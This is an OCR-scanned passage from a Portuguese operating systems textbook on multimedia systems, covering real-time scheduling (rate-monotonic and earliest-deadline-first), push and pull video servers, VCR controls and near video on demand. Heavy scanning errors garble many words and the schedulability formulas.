ha um unico processo (ou iliread) cujo irabalho e ter o 
filme do disco, um quadro por vez, e entao transmitir esse 
quadro para o usuario, Como todos os processos sao igual- 
memc importantes, tern a mesma quantidade de irabalho 
por quadro e bloąudam ąuando terminom dc processar 
o quadro atual, o escalonamento por a Fernanda circular 
{róund-tóbin) realiza esse irabalho sem problemas. O unico 
ineremento necessario aos algoritmos comutis de escalona- 
menio e o mccanismo de tcmporizaęao para assegurar que 
cada processo exec u te na frequencia correta. 

Um modo de eonsegnir a temporizaęao apropriada e 
ter um relógio-mesirc quc pulsc, por cxcmplo, 30 vez.es 
por segundo (para NTSC). A cada pułso, todos os processos 
sao cxccmados scąiicnrialmcnte, na mesma ordom, Quali¬ 
do um processo lermina seu trabalho, ele cmiLe urna cha- 
mada de sistema suspend que libera a CPU ate que o reló- 
gio-mestre pulse novamente. Quando isso a eon tece, todos 
os processos sao rcexecuiados na mesma ord cm, Enąuanto 
o numero de processos for peąueno o bastante para que 
todo o irabalho possa ser fcito em um intervalo dc tempo, 
o escalonamento circular sera suficiente. 

7.5.2 I Escalonamento geral de tempo real 

infelizmente, este modelo e raramenie apllcavel a rea- 
lidade. O numero tle usuarios se altera conforme os es- 


pectadores vem e vao, os tamanhos dos qnadros yariam 
exageradamente por causa da natureza da compressao de 
vfdeo (quadros I sao muito maiores que os ąuadros P ou B) 
e filmes diferentes podem ter resoluęóes diferentes. Como 
conscquenda, processos diferentes podem ser obrigados a 
executar cm frcquendas diferentes, com quantidadcs dife¬ 
rentes dc Irabalho e com prazos diferentes para terminal 
o irabalho. 

Essas consideraęoes levam a um modelo diferente: 
multiplos processos competindo pela CPU, cada qual com 
seu próprio irabalho e seus próprios prazos. Nos próximos 
modelos vamos supor que o sistema saiba a freąuencia na 
qual cada processo deve cxccutar, ąuanto Irabalho devc 
fazer e qual c seu prazo [dmdlme)> (O escalonamento de 
disco tambem e um topi co, mas sera abordado posterior- 
mente.) O escalonamento de multiplos processos cm com- 
peiięao — alguns dos quais obrigados a eumprir prazos — e 
cha mado de escalonamento de tem po reah 

Como cxemplo do lipo dc ambiente com o qual um 
escalonador mulumidia de tempo real trabaIha, considcrc 
os trćs processos, A, B e C mostrados na Figura 7.12. O 
processo A executa a cada 30 ms (aproximadamenie a taxa 
do NTSC). Cada quadro reąuer 10 ms de tempo de CPU. Na 
ausencia de competięao, o processo executaria nos surlos 
de CPU Al, A2, A3 etc., cada um iniciando 30 ms depois 
do anterior. Cada suito da CPU trata um quadro e tern um 
prazo: ele deve terminar antes que o próximo se inicie. 

Tambem estao ilustrados na Figura 7.12 dois outros 
processos, Be C O processo Bexeaua 25 vezes/s (por exen> 
plo, PAL) e o processo C executa 20 vezes/s {por exemplo, 
urn fluxo NTSC ou PAL mais lento, desiinado a um usua- 
rio com urna conexao de baixa largura de banda com o 
servidor de yfdeo). O tempo dc compmaęao pot quadm ć 
mostrado como 15 ms e 5 ms para 8 e C respectivamente, 
apenas para lornar o próbie ma de escalonamento mais ge¬ 
ral do que te-los todos tgttais. 

Agora, o pro bierna e como escalonar A t 8 c Casscgu- 
rando que eles cumpram sens respectivos prazos* Antes 
mesmo dcprocurar um algoritmo dc escalonamento, dcve- 
mos ycrificar sc esse conjunto de processos e escalonayel. 
Lembre-se da Seęao 2,4.4: se o processo /tiver um perfodo 
P ms e exigir C ms do tempo de CPU por ąuadro, o sistema 
sera escalonavei se e somente se 



em que m e o numero de processos (no caso, tres). Obscrve 
que CJP i e apenas a fraęao da CPU que esta sendo usada 
pęto processo /. Para o exemp!o da Figura 7*12, A esta con- 
sumindo 10/30 da CPU, B esta consuniindo 15/40 da CPU 
e C esta consumindo 5/50 da CPU. Juntas, essas fraęoes 
somam 0,80B da CPU; portanto, o sistema dos processos e 
cscaIoiiavd 
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I Figura 7.12 Tr£s processos periódicos, Gada um exibincfo unn filme. As taxas de quadro e os requisilos de pnocessamenfo por 
quadro sao diferentes para cada fi Ima. 


Ale agora, presurnimos que ha urn processo por łluxo. 
Na realidade, pode haver dois (ou mais) processos por flu- 
xo — por cxcmplo, um para o audio e outro para o vidco. 
Eles podem cxccutar cm taxas diferentes e podcm consu- 
mir quantidades diferentes de tempo dc CPU por surlo. 
Adidonar processos de audio ao conjumo nao alterana o 
modelo geral; contudo, estamospresumindo que ha m pro¬ 
cessos, cada um executando em urna frequeticia esperifica, 
com u ma ąuantidade fixa de t raba I ho necessaria para cada 
suno de CPU. 

Em aJguns sistemas de tempo real, os processos podem 
ser preemptivQs ou nao. Em sistemas multimfdia, os pro¬ 
cessos geral me me sao preempiivos, isto e, um processo que 
esteja no lim tar de nao cumprir sen prazo pode imerrom- 
per outro processo cm execuęao antes quc esic tcrmine seu 
tempo Quando o processo que intcrrompcti o outro acaba, 
o processo antę Kor pode prosseguir, Esse com port a men to 
e exatamente a multiprograniaęao, como vimos anterior- 
menle* Estudaremos algoritmos de escalonamento tle tem¬ 
po real preetnptivos, pois nao ha objeęao a des em sistemas 
mullinridia e des ofereccm um desempenho melhor que os 
nao preemptivos, A unica precauęao ć que, se nm bufferde 
transrnissao estivcr sendo prcenchido em pequenos surtos, 
o bulfer deve estar completamcnte cheio a te o firn do prazo 
e, porta nto, pode ser emiado ao u su ario em urna unica 
operaęao* Caso contrario, um jitter pode ser imroduzido. 

Algoritmos de tempo real podem ser estaticos on dina- 
micos. Os algoritmos estaticos atribuem antedpadameme 
uma priori da de fixa a cada processo c, entao, fazem o cs- 
ca łona men to preemptivo priori za do uiilizando essas prio¬ 
ridades. Os algoritmos di na mi cos nao apresentam priorida- 
des fixa$. A seguir, estudaremos umexemplo de cada lipo, 

7.5.5 I Escalonamento por taxa monotónica 

O algoritmo classico dc escalonamento cstatico dc 
tempo real para processos prccmptivos e periódicos e o 

escalonamento por taxas monotónicas {rakmonotonie 


schedulm — RMS) (Li u e La y land, 1973), Pode ser u sad o 
para processos que salisfaęam as seguintes condięoes; 

L Cada processo periódico deve terminar dentro de 
seu periodo. 

2. Nenhum processo e dependente de qualquer outro 
processo. 

3. Cada processo precisa da mesma ąuantidade de 
tempo de CPU a cada surto. 

4. Quaisquer processos nao periódicos nao podem ter 
prazos. 

5. A preempęao de processo ocorre instanianeameme 
e sem sobrecargas. 

As primeiras ąuatro condięoes sao razoaveis. A ultima, 
claro, nao o ć, mas torna a modelagem do sistema muito 
mais facil. O RMS funciona atribnindo a cada processo uma 
prioridade fixa igual a freąudncia de ocorrenria de seu cven- 
lo de disparo. Por exemplo, um processo que deva executar 
a cada 30 ms (33 vezes/s) recebe prioridade 33; outro, que 
tenha de executar a cada 40 ms (25 vczes/s), recebe priorida¬ 
de 25; e um processo que execulc a cada 50 ms (20 vezes/s) 
recebe prioridade 20, Porta ino, as prioridades sao lineares 
em relaęao a freąuencia (numero de vezes/segundo que o 
processo executa). Por isso, o escalonamento e chamado 
mon oto n ico. No tempo de exccuęao, o escalonador sempre 
executa o processo que csiivcr pronto c com a prioridade 
mais alta, fazendo a preempęao do processo em execuęao se 
for necessirio. Li u e Layland provaram que o RMS e mimo 
para a classe de algoritmos de escalonamento estaticos. 

A Figura 7.13 rnostra como o escalonamento mono¬ 
tonia) por iaxas funciona para o excmplo da Figura 7,12. 
Os processos A f B e Ctem prioridades estaticas 33, 25 e 20, 
respeciivamcnte, o que signiftea que, se A precisa executan 
ele executa, fazendo a preempęao de qualquer outro pro¬ 
cesso que esteja usando a CPU, O processo B pode fazer a 
preempęao dc C r mas nao dc A. O processo C deve esperar 
atć que a CPU fique ociosa para que possa executar. 
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1 Figura 7,13 Um exemplo de RMS e EDF com escalonamenta em tempo real. 


Na Figura 7,13, inklalmente todos os trcs proccssos cs- 
tao prontos para executar, 0 de prioridade mais alia, A, e 
escolhido e a u Lor iza do a executar aie que termine em 10 ms, 
eon formę i I ust rado pela linha RMS. Depois de terminar, B e 
Cexecmam naąuela ordem. .Junios, esses proccssos lcvam 
30 ms para executar e, assim, quandoC terminar, sera a vcz 
de A exeaitar novamentc. Essa rotaęao prossegue ate que o 
sistema lique ocioso em 1 = 70 , 

Em f = 80, B fi ca pronto c executa. Contudo, em t- 90, 
urn processo de prioridade mais alta, A, fica pronto c, en- 
tao, la z a preempęao de Be execuia ale que termine, em t = 
100. Ncsse ponto, o sisicma pode escolher entre terminar B 
ort inirializar C, e assim de escolhe o processo de prioridade 
mais ałta, ou seja, B, 

7-5,4 I Escalonamento prazo mais curto 
primeiro 

Outro algoritmo popular de escalonamento de tempo 
real ć o do prazo mais curto primeiro (earliest deadlim 
first — EDF}. O EDF c um algoritmo dinamko quc nao rc- 
quer quc os proccssos sejam periódkos, como no algoritmo 
do RMS. Tambem nao exige o niesmo tempo dc cxecu- 
ęao por surto de CPU, como o RMS, Se precisar de tempo 
de CPU, o processo ammciara sua presenęa e seu prazo, O 
escalonador tein urna lista de proccssos executaveis, ordę- 
nados por yencimentos de prazo. O algoritmo executa o 
primeiro processo da lista, aquele cujo prazo e o mais cuno 
(mais próximo de vencer). Se um novo processo tornar- 
-se pronto, o sistema vcrificara se sen prazo vence antes 
do prazo do processo em execuęao. Em caso afirmativo r o 
novo processo faz a preempęao do quc cstivcr executando. 

Um exemplo de EDF e visio na Figura 7.13. fnicial- 
mente, todos os tres processos estao prontos. Bies sao exe- 
cutados na ordem de venrimento de seus prazos. A deve 
terminar em t - 30, B deve terminar em i - 40 e C deve terrni- 
nar em i - 50; portanto, o prazo de A vence antes e r assim, 
executa antes. Ate t - 90, as escolhas sao as mesmas do 
RMS, Em t = 90, A torna-sc pronto novamentc c o vend- 
mento dc seu prazo c t - 120 — o rnesmo vendmento dc B. 


O escalonador poderia legitimamente escolher um ou ou¬ 
tro para executar, mas, na pratica, a preempęao dc Bapre- 
senta algum custo associado. E mclhor, portanto, ddxar B 
cxeeutando cm vcz dc incorrcr no custo da troca. 

Para dissipar a ideia de que o RMS e o EDF sempre 
chcgam a os mesmos resuliados, e stu demos um outro 
excmplo r mostrado na Figura 7,14. Nele, os periodns de A r 
B e Csao os mesmos de antes, mas agora A predsa dc 15 ms 
dc tempo dc CPU por surto, c nao dc apenas 10 ms. O teste 
de escalonabilidadc calcula a ocupaęao da CPU como 0,500 + 
0/375 + 0/100 = 0,975. Resta m somente 2,5 por cen to da 
CPU, mas na teoria a CPU nao esta sobrecarregada e seria 
possfvel fazer um escalonamento valido. 

Para o RMS, asprioridades dos trćs proccssos ainda sao 
33, 25 e 20, ja que somente o perfodo c o quc interessa, c 
nao o tempo de execuqao. Ncsse caso, BI nao termina an¬ 
tes de i = 30, i usta me em que A esta pronto para executar 
novamente. No momento em que A termina, em r= 45, B 
esta pronto de novo e, portanto, com prioridade mais aha 
que C, B executa e o prazo de C vence, O RMS fal ha. 

Agora vejamos como o EDF lida com esse problema. 
Etn t- 30, ha uma disputa entre A2 e Cl. Como o prazo de 
Cl vence em 50 e o prazo de ,42 vence em 60, Ce esealona- 
do, Isso e diferente do que ocorre no RMS, em que A ganha 
porąue icm a prioridade mais alta, 

Em t - 90, A fica pronto pela ąuaria vez. O venci~ 
memo do prazo de A e igual ao do processo em execuęao 
(120), portanto o escalonador deve escolher entre fazer 
ou nao a preempęao. Como antes, se nao for necessario, 
e melhor nao fazer a preempęao: desse modo, B 3 ć auto- 
rizado a terminar. 

No exemplo da Figura 7.14, ate t= i 50, a CPU esta 100 
por cent o otupada. Contudo, ocasionalmetue t>correra um 
imervalo, pois a CPU e somente 97,5 por cenio uu li zada. 
Como todos os momentos dc infcio e Fim sao multiplos de 
5 ms, o intervalo sera de 5 ms. Entao, para conseguir os 
2,5 por cento de tempo ocioso, o intervaio de 5 ms devera 
ocorrcr a cada 200 ms. Ś por isso que o intervalo nao apa- 
rcce na Figura 7.14. 
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I Figura 7.14 Outro exemplQ de escalonamento em tempo real conn RMS e EDF. 


Oma ąuesiao imeressante e o motivo pele qnal o RMS 
falliou, Basica menie, o uso de priori da des eslaticas só fun¬ 
dona se a ocupaęao da CPU nao for muito grandę* Liu e 
Layland (1973) provaram que, para qualquer sistema de 
proces sos period i cos, se 

m f 

1*1 J 

entao e gara nikło que o RMS funeione* Para 3, 4 H 5, 10, 
20 c 100 processos, as maximas ulilizaęoes permitidas sao 
0,780, 0,757, 0,743, 0,718, 0,705 e 0,696. Conformę m 
«>, a ocupaęao maxima lorna-se assinlóika a In 2. Em om ras 
palavras, Liu eLayland provaramque, para tresprocessos, o 
RMS sempre fundona se a ocupaęao da CPU fi car abaixo ou 
igual a 0,780. No prtmeiro exempio P essa ocupaęao era de 0,808 
e o RMS fundonava, mas fot apenas sorte. Com penodos 
e lempos dc exccuęao dilerem es, u ma taxa de ocupaęao de 
0,808 poderia falhar. No segondo exemplo ł a ocupaęao 
da CPU era tao aha (0,975) que nem havia esperanęa de 
que o RMS pudesse funckmar. 

Por outro lado, o EDF sempre fundona para qua3- 
quer conjmuo de processos escalonaveis. Ele pode atingir 
urna ocupaęao de 100 por cento da CPU. O custo disso e 
a comp!exidade do algoritmo. Assim, cm um servidor dc 
vfdeo rcal, se a ocupaęao da CPU estiver abaixo do li mile 
do RMS, esic po dera ser usado. Caso conirario, sera neces- 
sario escollicr o EDF. 



Paradigmas de sistemas de 
arquivos multimidia 


Agora que cobrimos o cs ca łon a niemo de processos cm 
sislemas multimidia, prosseguiremos esludando os sistemas 
de arquivos multimidia (esses sistemas de arquivos usain um 
paradigma diferentc dos sistemas dc arquivos tradidonais). 
Antes, farcmos urna rcvisao da E/S dearquivos tradidonal 
e, depois, concentrarcmos nossa aLenęao cm como sao or- 


ganizados os $ervidores de arquivos multimidia. Para ter 
acesso a um arquivo, um processo emite, antes de tu do, 
uma chamada de sisiema open. Se nao liouver probiemas, 
sera da da uma esperie de identificador a quem chamou. 
Esse identificador e chaoiado de descritor de arquivo no 
UNIX ou de manipulador no Windows e sera usado nas 
chamadas futuras que envolverem esse arquivo. ftesse 
porno, o processo pode cmiiir uma chamada dc sisiema 
nead, forncccndo como parametros o identificador, o ende- 
reęo do buffer c o mimero dc bytes, O sisiema opera cional 
entao ret orna os dados requisitados no buffer. Podem ser 
feitas ou tras chamadas read, ate que o processo ter minę. £, 
entao, o momerno de chatnar close para fecliar o arquivo e 
devolverseu£ recursos. 

Esse moddo nao fundona bem para multimfdia por 
causa da oecessidade de um eomportamento de tempo real. 
Fundona a i uda piór para mostrar arquivos multimfdia quc 
saern dc um semdor rcmoto de vtdco. Um problem a c 
quc o usuario deve fazer as chamadas read predsamente 
espaęadas no tempo. Um segundo problema e que o servi- 
dor de video dcve ser capaz de fornecer os biocos de dados 
sein a traso — algo diffcil de conseguir quando as reąuisi- 
ęoes vierem de modo nao planejado e nao houver recursos 
rese rva do s a n te cipa d a ment e. 

Para resolver esses probiemas, os servidores de arqui- 
vos multimidia usam um paradigma com pieta mente dife¬ 
rente: des agein como se fossem apardhos de videocas- 
sete (video crnette recorden— VCR). Para ler um arquivo 
multimfdia, um processo de usuario emite unia chamada 
de sisiema start, especificando o arquivo a ser lido e varios 
outros parametros — por exemplo, quais trilhas de audio e 
de legenda devem ser usadas. O servidor de vfdeo comeęa, 
entao, a enviar os quadros na taxa de ąuadros requisitada. 
Fica a cargo do usuario trata-los na taxa que os quadros 
vierem. Se o usuario se cansar do filme, a chamada de siste- 
ma stop terminala o fluxo. Scrvidorcs de arquivos com esse 
moddo dc fluxo sao chamados dc servidores push (pois 
des empurram os dados para o usuario) c sao diferentes 
dos tradidonais servidores puli, nos quais o usuario deve 
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puxar os dados, um bloco de cada vez, chamando repetida- 
mente o read para obler um bloco após o outro. A diferenęa 
entre esses dois modelos e ilustrada na Figura 7.15. 

7-6.1 I Funcoes de centrale VCR 

A maioria dos servidores dc vtdeo tambem implementa 
funęoes-padrao de comrole VCR, indusive pausa, avanęo 
rapido c rebobinamento. A pausa ć bastantc dara. O usua- 
rio envia uma mensagem para o servidor de vrdeo pedindo 
quc parć, Ncssc caso, o ąuc o scrvidor dcvc fazer c Icmbrar 
qual ć o próximo ąuadro, Quando o usuariopedirpara quc 
o servidor prossiga, dc apenas conilnuara de on de parott. 

Comudo, ha uma compUcaęao. Para obter um desem- 
penho aceilavel r o servidor pode reservar recursos como 
largura de banda de disco e buffers de memória para cada 
fluxo de saida, Continuar retendo esses recursos enąuamo 
um fiImc csla cm pausa desperdięa recursos, principalmen- 
le se o usuario estiver planejando uma ida a cozinha para 
buscar urna pizza congelada (cspcdalnieme uma giga u te), 
assa-la no micro-ondas e co me-la. E claro que os recursos 
pod cm ser fadlmente liberados ąuando estiverem em pau¬ 
sa, mas, se o usuario tentar continuar, liavera o perigo de 
nao poder mois rcadquiri-los. 

O rebobinamento e bem faciL Tu do o quc o scrvidor 
precisa fazer e lembrar que o prtmmo ąuadro a ser enviado 
c o 0, O que poderia ser mais simples? Comudo, o avanęo e 
o reirocesso rapidos (isto e, reproduzirenąuanto rebobina) 
sao mais complicados. Se nao fosse pela compressao, uma 
maneira de avanęar a velocidade norma) em dez vezes seria 
apenas exibir um quadro a cada dez. Para avanęar em 20 
vczes, seria predso mostrar um quadro a cada 20, Na vcr- 
dade, sem compressao, avanęar ou retroceder em qualquer 
velocidade e faciL Para reproduzir a veloddade normal em 
k vezes, e só mostrar um quadro a cada k quadros. Para 
fazer o retrocesso rapido a veloddade normal k vezcs, e 
só fazer a mesma coisa na outra direęao* Esse sistema fun- 


Servidor 

de video Cliente 



clona igualmente bem, tanio para os servkiores puli ąitanto 
para os servidores pusli. 

A compressao complica o movimento rapido para a 
frente ou para tras, Com unia fila dc vfdeo digital, para 
a qual cada ąuadro e comprimido independememenie de 
todos os ouiros, e posstyel usar essa estrategia, desde que 
o ąuadro necessario possa ser encontrado rapidanieme. 
Como a compressao de um ąuadro depende de seu con- 
teudo, cada ąuadro tern um tamanho diferente; portanto, 
saltar k quadros no arquivo nao pode ser feito por um cal- 
culo numerico. Alem disso, a compressao dc audio e inde- 
pendente da compressao de vfdeo; assim, para cada quadro 
dc vfdco cxibido no modo dc alta vdoridade, tambem dcvc 
ser encontrado o ąuadro correto de audio {a menos quc 
o som seja desligado ąuando cstiver reproduzindo em um 
modo mais rapido que o normal), Portanto, o avanęo ra¬ 
pido de u ni arquivo de vfdeo digital reąuer um mdice ąue 
penntta que os ąuadros sejam localizados rapida me me. 
Pelo menos, na teoria, isso e possfvel. 

Com o MPEG, esse csąucma nao funciona nem na teo¬ 
ria, por causa dos ąuadros L P e B, Saltar & ąuadros a frente 
(presumindo que isso possa ser feito) poderia parał em um 
ąuadro P, que e baseado em um ąuadro 1 que ja foi saltado. 
Sem o ąnadrobase, ter apenas as mudanęas incremeniais 
a partir dek (o que, na verdade, os ąuadros P comem) e 
intiiiJ. O MPEG reąuer ąue o arquivo seja reproduzido se~ 
ąuendalmente. 

Outro modo tle lidar com o probkma e tentar repro- 
dtizir o arquivo seąuendalinente em uma velocidade dez 
vezes maior. Comudo, isso reąuer ąue os dados sejam reti- 
rados do disco em uma veloddade dez vezes maior. Nesse 
ponto, o servidor poderia tentar descomprimir os ąuadros 
(algo que geraimente de nao faz), calcułar qual ąuadro 
e necessario e recomprimir a cada dez ąuadros como um 
ąuadro I. Comudo, essa soluęao impóe uma enorme car- 
ga computacional ao scrvidor. Tambem e necessario ąuc o 
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i Figura 7.15 (a) Um seryielor puli, (t>) Um servidor push. 
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servidor entenda o formatu cle eompressao — algo que ele 
nao tem de saber. 

A akemativa de reaJmenie enviar todos os dados ao 
usuario pda rede e deixar os ąuadros corretos serem se- 
tcdonados la reąuer que a rede amnente a taxa de trans- 
missao em dez vezes. Isso seria possfvel, mas certameme 
nao e facil, por causa das alias taxas nas ąuais o semdor 
normalnienie i obrigado a opera o 

De modo geral, nao ha urna maneira facil A unica es- 
tralćgia viavel .reąuer um planejamenlo antęcipado. O que 
pode ser feito e construir um arquivo espedal que conte- 
nha, por cxemp!o, cada um dos ąuadros muliiplos de deze 
comprimir esse arquivo u san do o algoiitmo MPEG norirtal. 
Esse arquivo esta ilnsirado na Figura 7.2 como 'avanęo ra- 
pido r . Para akernar para o modo de avanęo rapido, o que 
o servidor deve fazer e calcular omie o usuario esta no ar- 
quivo de avanęo rapido, Por exemplo, se o ąuadro alual for 
o 4S.210 e o arquivo dc avanęo rapido reproduzlr em dez 
vezes, o semdor deve Jocalizar o ąuadro 4.821 no arquivo 
de avanęo rapido e comeęar a reproduzir dali em dianie cm 
vclocidadc normaL E ciaro quc aqude ąuadro pode ser um 
ąuadro P ou B, maso processo de decodificaęao no cliente 
pode simplesmente salta r os ąuadros aie que apareęa um 
ąuadro L O retrocesso c fciio de maneira analoga, usando 
um seguiido arquivo preparado especialmente para isso. 

Quando o usuario volla para a veloddade norma), esse 
truąue deve ser feito ao conlrario. Se o ąuadro alual no ar- 
quivo de avanęo rapido for 5.734, o servidor simplesmente 
votla para o arquivo norma 1 e continua a parlir do ąuadro 
57.340. Novamente, se esse ąuadro nao for um ąuadro l o 


processo de decodificaęao no lado do cliente deve ignorar 
lodos os ąuadros ate que apareęa um ąuadro I. 

Embora esses dois arquivos adicionais faęam o trabalho, 
essa soluęao apresenta algumas desvantagem. Primeiro, e 
necessario alginn espaęo extra em disco a firn de armazenar 
os arquivos adicionais. Em segtmdo lugar, o avanęo e o re¬ 
trocesso rapidos podem ser feitos somenie nas veloddades 
corres pondem es dos arquivos especiais. Em terceiro lugar, 
a complexidade extra e necessaria para altemar entre os ar- 
quivos normais, de avanęo rapido e de retrocesso rapido. 

7A2 ! Video quase sob demanda 

Ter k usuarios assisdndo ao mesmo fil me impoe, es- 
scnciaImente, a mesma carga sobrc o servidor do que te- 
-los assistindo a k fil mes diferentes. Gont lido, com uma pc- 
ąuena mudanęa no modelo, sao possfveis grandes ganhos 
de desempenho. O problema do videosob demanda e que 
os usuarios podem comeęar o fluxo de um novo fil me em 
um momenio arbitrario; portanto, se houvercem usuarios, 
todos comeęaiido a ver algum novo fi l nie por volta das 
20 li, ha a possibiiidade dc que dois usuarios nunca iniciem 
exa lamente no mesmo insunuc — assim, des nao podem 
compartilhar um Muxo. A alieraęao que possibiLila a oti- 
mizaęao consisie em informar a todos os usuarios que os 
fil mes comeęam somentc na hora clieia e depois de cada 
drico minuios, por exemplo. Portanto, se um usuario qui- 
ser ver um filmc as 20h02, ele tera de esperarate as 20h05. 

A vantagem e que, para um fi lnie de duas ho ras, sao 
necessarios someme 24 fi u x os, nao importando o nilmero 
de consnmidores. Conforme iiustra a Figura 7.16, o pri- 
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I Figura 7.16 O video qua$e sob demancia tom um novo Jluxo ioECiando em interva[os regulares; no exemplo dado, a cada cinco 
minutos (9.000 ąuacfros}. 
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meiro fluxo comeęa as 20h. As 20h05, ąuando o primei- 
ro fluxo esdver no ąuadro 9.000, o fliixo 2 se inictara. As 
20H10, ąuando o pri meiro Huxo estiver no ąuadro 18.000 
e o fluxo 2 no ąuadro 9,000, o f!uxo 3 comeęara € assim 
ira ate o fluxo24, ąuesc inida as 21h55. As22h, o fluxo I 
termina e comeęa com o ąuadro 0. Esse esąuema c chama- 
do de vfdeo ąuase sob demanda (near video on demami), 
porqne o vfdea nao comeęa no momento da reąinsięao, 
mas um pouco depois dcla. 

Nesse caso, o para metro prindpal e o nu mero de ve- 
?x s que um fluxo se inida, Sc um fluxo sc inidar a cada 
dois minutos, sera o necessarios 60 fluxos para um lii me 
de duas lioras, mas o tempo maximo de espera para co¬ 
meęa r a ve-lo sera de dois minutos. O operador deve de- 
ddir ąuanto tempo as pessoas estao dispostas a esperar, 
pois, ąuanto mais puderem esperar, mais efiriente sera 
o sistema c mais filmes podcrao ser exibidos simultanea- 
menie. Urna altcrnativa e ter inna opęao sem espera, na 
qual um novo fluxo se inida imediatamente, mas cobra- 
-se mais pelo inicio imediato. 

Dc certo modo, o vfdeo sob demanda e como usar um 
taxl: voce chama c cle vem. O vfdeo ąuase sob demanda 
e como usar urn onibus: ha unia escaia fixa de horarios 
e e preciso esperar pelo próximo horario, Mas o transito 
cm massa só faz sem ido se houver urna massa. No centro 
de Manhattan, um onibus que passe a cada cinco minutos 
pode contar com pelo menos algims passageiros. Um dni- 
bus viajando pelas estradas do Wyoming pode estar quase 
sempre vazio. Da mes ma mancira, o lanęamento do ultimo 
fil mc dc Stcven Spielberg pode atrair consumidorcs snfi- 
dentes para gara mir o inicio de um novo fluxoa cada cinco 
minutos; em contrapartida, em relaęao a ...E o vento kvou t 
talvez seja melhor simplesmente oferece-lo sob demanda. 

No vfdeo quasc sob demanda, os usuarios nao tern 
contro] es VCR. Nen turni usuario pode dar urna pa Lisa no 
HI me para nma Ida a cozinha. O melhor que pode ser feito 
e, ąuando retornar da cozinha, entrar em um fluxo que le¬ 
li ha comcęado depois e, por isso, algims minutos do vidco 
estarao repetidos* 

Na vcrdadc, tambem ha outro moddo para o vfdco 
ąttase sob demanda, Em vez de anunciar antedpadamente 
qtse algims filmes espedlicos comeęara o a cada cinco mi¬ 
ii u los, as pessoas podem pedir os filmes que ąuiserem. A 
cada cinco minutos, o sistema verifica quais filmes foram 
pedidos e os inida, Com cssa estratdgia, um Silnie pode eo- 
meęar as 20h, 20hlQ, 20h!5 e 2Gh25, mas nao nos horarios 
imermediarios, dependendo da demanda. Como resultado, 
os fluxos sem espectadores nao sao transmilidos, cconomi- 
zando largura de banda em disco, capaddade de memória 
e de rede. Por outro lado, atacar a gdadeira e como apostar 
sem a garamia de que um outro fluxo esieja com o mesmo 
filme atrasado em cinco minutos. Claro, o operador pode 
ofereccr urna opęao ao usuario para mostrar urna lista de 
todos os fluxos cm uso, mas a maioria das pessoas acredila 


que sens comroles remotos de TV ja tern botoes demais e 
nao aceitain tao bem a inclusao de algumas opęoes a mais. 

7-6 3 I Video ąuase sob demanda com 

funeoes VCR 

# 

A combinaęao ideał seria o vfdeo ąuase sob demanda 
(pela c fi den da) c mais todos os comroles VCR para cada 
espectador individuajmcme (para conveniencia do usua¬ 
rio). Com peąuenas modificaęoes no moddo, esse projeto 
e pos$ivcl, A seguir, mostraremos urna peąucna descri- 
ęao simplificada de como conscguir isso (Abram-Profeia c 
Śhia 1998), 

Iniciamos com o esąuema-padrao do vfdeo ąuase sob 
demanda da Figura 7.16. Com u do, adicionamos o rcąui- 
siło de quc cada inaąuina diente mantem localmentc um 
bufler dos AT" minutos anteriores e dos AT minutos seguin- 
ies> Manier o buffer dos AT minutos anteriores i' la cii: e só 
salva-lo depois dc exibi-lo. Maniero buffer dos AT minutos 
seguimes e mais dificil mas e possfvel se maąuinas diemes 
tiverem a capaddade de !er dois Quxos de nma vez. 

Urna maneira dc configurar o buffer pode ser ilustrada 
usando um exemplo. Se um usuario comeęar a assistir as 
20hl5, a maąuina diente lera e exibira o f!uxo as 20hl5 
(que esta no ąuadro 0), Paralela menie, a maąuina diente 
le e armazena o f]uxo das 20hlG, quc esta, entao, na mar¬ 
ca dos cinco minutos (isto e, no ąuadro 9,000), As 20h2G, 
os ąuadros de 0 a 17.999 foram armazena dos e o usuario 
deseja ver o ąuadro 9.000. A partir desse ponto, o fluxo das 
20hl 5 e desprezado, o buffer ó precnchido com o fluxo das 
20hl0 (que esia no ąuadro 18.000) e a exibięao edesviada 
para o rneio do buffer (o ąuadro 9.000). Conforme cada 
novo ąuadro e lido, um novo ąuadro ć adicionado ao firn 
do buffer e um ąuadro e eliininado do inicio do buffer. O 
ąuadro que esta sendo most rado, chamado de ponto de 
exibięao {playpoint), localiza-se sempre no rneio do buffer. 
A siluaęao dos 75 minutos no filme e most rad a na Figura 
7,17(a). Ncssc easo, lodos os ąuadros entre 70 e 80 minutos 
estao no buffer. Se a iaxa de dados c de 4 Mbps, um buffer 
de dcz minutos rcąuer 300 mjlhoes de byies de armaze- 
namento. Aos preęos aiuais, o buffer pode, com cerieza, 
ser maiuido em disco e possivclmente em RAM. Em RAM 
seria o ideał, mas 300 milhóes de byies em RAM e minio; 
assim, pode ser osado um buffer menor. 

Agora, suponha que o ustiario decida fazer um avanęo 
ou um retrocesso rapkios. Enquanto o ponto de exibięao 
estiver no intervalo entre 70 e S0 minutos, a exibięao po- 
dera ser alimentada a paitir do buffer. Contudo, se o ponto 
dc cxibięao sc mover para fora desse intcrvalo, tercmos um 
problem a. A soluęao seria acionar um fluxo priyado (isto 
e, um ytdeo sob demanda) para o servięo do usuario. O 
movimemo rapido em cada direęao pode ser iraiado pelas 
teenicas discuiidas ameriornientc. 

i, de esperar que cm algum ponto o usuario sc sema- 
ra e dcci di ra assistir ao filme em veloddade normal nova- 
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nieme. Nessas circunstandas, podemos pensar em migrar 
o usuario para um dos fluxos de vfdeo quase sob demanda 
{para que o fluxo privado possa serliberado), Stiponha, por 
exemplo, que o usuario de ci da voltar a marca dos 12 mi- 
linios, conformc mostra a Figura 7.17(b). Essc porno esta 
bem fora do buffer e, ponamo, a exibięao nao pode ser 
alirnemada a partir dele. Alem disso, como o chaveaniemo 
aconteeeu (instamaneanieme} aos 75 minutos, ha fluxos 
mostrandoo filnie em 5,10, 15 e 20 minutos, mas ncnhum 
a 12 minutos. 

A soluęao ę continuar assistindo no fluxo privado, mas 
comeęar a preencher o buffer do fluxo que esta alualmente 
a 15 minutos do initio do Jilme. Depois de tres minutos, 
ocorre a situaęao iluś trąd a na Figura 7.17(c). O porno de 
exibięao es la, eniao, em i 5 minutos, o buffer comem os 
minutos de 15 a 18 e os (luxos de vfdco quase sob dema li¬ 
da estao em S, 13, 1S e 23 minutos, entre outros. Ncsse 
porno, o fluxo privado pode ser liberado e a exibięao pode 
ser alimentada a partir do buffer O buffer continua a ser 
preenchido a partir do fluxo que esta agora em 18 minutos. 
Depois de mais um minuto, o porno de exibięao esta em 16 
minutos, o buffer contem os minutos de 15 a 19 c o fluxo 
alimentando o buffer esta em 19 minutos, confonne mos¬ 
tra a Figura 7.17(d). 

